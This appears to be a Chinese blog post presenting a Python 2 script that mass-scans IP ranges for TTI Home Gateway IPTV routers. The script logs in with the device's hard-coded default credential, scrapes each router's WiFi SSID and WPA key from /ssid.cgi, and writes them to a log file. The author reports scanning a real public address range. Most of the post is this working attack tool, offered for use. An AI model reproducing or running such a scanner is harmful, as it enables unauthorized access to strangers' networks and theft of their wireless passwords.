批量获取TTI Home Gateway宽频IPTV无线ssid和密码脚本

这个漏洞主要是设备存在默认口令的问题。我这里用 Python 模拟 HTTP 基本认证（401）登录后，再请求对应的页面，就可以获取到 WiFi 的 SSID 和密码。下面是脚本代码，很简单。

#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-08-08 09:59

import Queue
from threading import Thread
import time
import re
import os
import subprocess
import urllib2

#ip to num
def ip2num(ip):
    """Convert a dotted-quad IPv4 string such as '192.168.0.1' to its 32-bit integer form.

    No validation is performed: a non-numeric field raises ValueError and
    fewer than four fields raise IndexError; any fields beyond the fourth
    are converted but otherwise ignored.
    """
    octets = [int(field) for field in ip.split('.')]
    # Start from the last octet so that a short input still fails with
    # IndexError, then OR the higher octets in at their bit positions.
    value = octets[3]
    for shift, octet in zip((24, 16, 8), octets):
        value |= octet << shift
    return value

#num to ip
def num2ip(num):
    """Inverse of ip2num: render the low 32 bits of integer *num* as a dotted-quad string."""
    return '.'.join(str((num >> shift) & 0xff) for shift in (24, 16, 8, 0))

#get all ips list between start ip and end ip
def ip_range(start, end):
    """Return every address from *start* to *end* (inclusive) as strings, skipping those ending in .0.

    Only the x.x.x.0 address of each /24 is dropped; the .255 address is kept.
    The whole list is materialised in memory, so wide ranges are expensive.
    """
    lowest = ip2num(start)
    highest = ip2num(end)
    return [num2ip(value) for value in range(lowest, highest + 1) if value % 256 != 0]

#main function
def bThread(iplist):
    """Prompt for a worker count, then scan every host in *iplist* with that many tThread workers.

    Python 2 only (raw_input, print statement). Hosts are handed to the
    workers through a shared Queue; the function returns once every worker
    has finished. A non-numeric answer to the prompt raises ValueError at
    int() -- after the "Running" banner has already been printed.
    """
    answer = raw_input('Thread: ')
    print '[Note] Running...\n'
    pending = Queue.Queue()
    for host in iplist:
        pending.put(host)

    workers = [tThread(pending) for _ in xrange(int(answer))]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()

#create thread
class tThread(Thread):
    """Worker thread: takes hosts off the shared queue and calls checkTTI on each until the queue is empty."""

    def __init__(self, queue):
        super(tThread, self).__init__()
        self.queue = queue

    def run(self):
        # PORT is a module global set by the __main__ block.
        global PORT
        # NOTE(review): empty() followed by get() is not atomic, so a worker
        # may block in get() if another worker took the last host in between.
        while True:
            if self.queue.empty():
                break
            host = self.queue.get()
            try:
                checkTTI(host, PORT)
            except:
                # Any failure for this host is ignored; move on to the next one.
                continue

def checkTTI(host,port):
    """Fetch /ssid.cgi from one gateway with the built-in default credential and log the SSID/key it returns.

    Python 2 only (urllib2, print statement). Every error is swallowed by the
    bare except at the bottom, so a host that is unreachable, rejects the
    credential, or returns markup the regexes do not match produces no output
    at all -- and so do failures that are bugs here (e.g. LOGFILE not set).
    """
    aimurl = "http://"+host+":"+port+"/ssid.cgi"
    # Hard-coded default credential of the device class; the write-up above
    # identifies this default password as the vulnerability.
    username = 'login'
    password = 'gzcatvnet'

    # Basic-auth handler with an empty realm, registered for aimurl only.
    auth = urllib2.HTTPBasicAuthHandler()
    auth.add_password('', aimurl, username, password)
    # CacheFTPHandler plays no part in an http:// request.
    opener = urllib2.build_opener(auth, urllib2.CacheFTPHandler)
    # install_opener changes the process-wide default opener -- a module-level
    # side effect shared by every worker thread that calls this function.
    urllib2.install_opener(opener)

    try:
        data = urllib2.urlopen(aimurl,timeout = 5)
        htmlcontent = data.read()
        data.close()

        # Both patterns are tied to the exact attribute order and spacing of
        # the device's form markup; a different layout yields [] and the [0]
        # indexing below raises IndexError (swallowed by the outer except).
        resssid = re.findall(r'<input id=\"tmp_ssidid\" value=\"(.+?)\" size=\"16\" maxlength=\"16\">',htmlcontent)
        reskey = re.findall(r'<input name=\"wl_wpa_psk\" value=\"(.+?)\" size=\"32\" maxlength=\"32\" type=\"password\" >',htmlcontent)
        #print log
        # NOTE(review): in Python 2, str.encode('utf8') on a byte string first
        # decodes it as ASCII, so a non-ASCII SSID or key raises
        # UnicodeDecodeError here -- also swallowed by the outer except.
        print host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8')
        #write to log file
        # LOGFILE is a module global opened by the __main__ block; the key is
        # written in clear text. The finally clause flushes anyway, so the
        # flush inside the try is redundant.
        try:
            LOGFILE.write(host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8')+'\n')
            LOGFILE.flush()
        finally:
            LOGFILE.flush() 
    except:
        # Deliberately silent: any failure for this host is ignored.
        pass
        


if __name__ == '__main__':
    # Python 2 entry point (print statements, raw_input). Prompts for an IPv4
    # range, expands it with ip_range() and hands the list to bThread().
    print '\n########### Hunt the TTI Home Gateway ##########\n'
    print '                Author 92ez.com'
    print '          Last modify 2015-08-08 09:59\n'
    print '################################################\n'
    # Module globals read by the worker threads (tThread.run reads PORT,
    # checkTTI writes to LOGFILE). A 'global' statement at module scope has
    # no effect; the plain assignments are what define the names.
    global PORT
    PORT = '80'

    global LOGFILE
    # Opened with 'w+' in the current working directory, so an existing
    # TTI_KEY.log is truncated on every run. Keys are written in clear text
    # and the file is never explicitly closed here (checkTTI flushes per
    # record; closing is left to interpreter exit).
    LOGFILE = open(os.path.abspath('.')+'/TTI_KEY.log', 'w+')

    startIp = raw_input('Start IP: ')
    endIp = raw_input('End IP: ')

    # ip_range returns a full list, so a wide range is materialised in memory
    # before any scanning starts.
    iplist = ip_range(startIp, endIp)
    
    print '\n[Note] Will scan '+str(len(iplist))+" host...\n"

    bThread(iplist)


当然,扫描的网段可能比较有限,因为这种设备一般都有区域性,每个省所使用的设备可能不同。博主这里测试的网段是119.32.2.*到119.36.1.1


扫描完成后，结果会自动保存到文本文件中。

本文链接:https://www.92ez.com/?action=show&id=23343
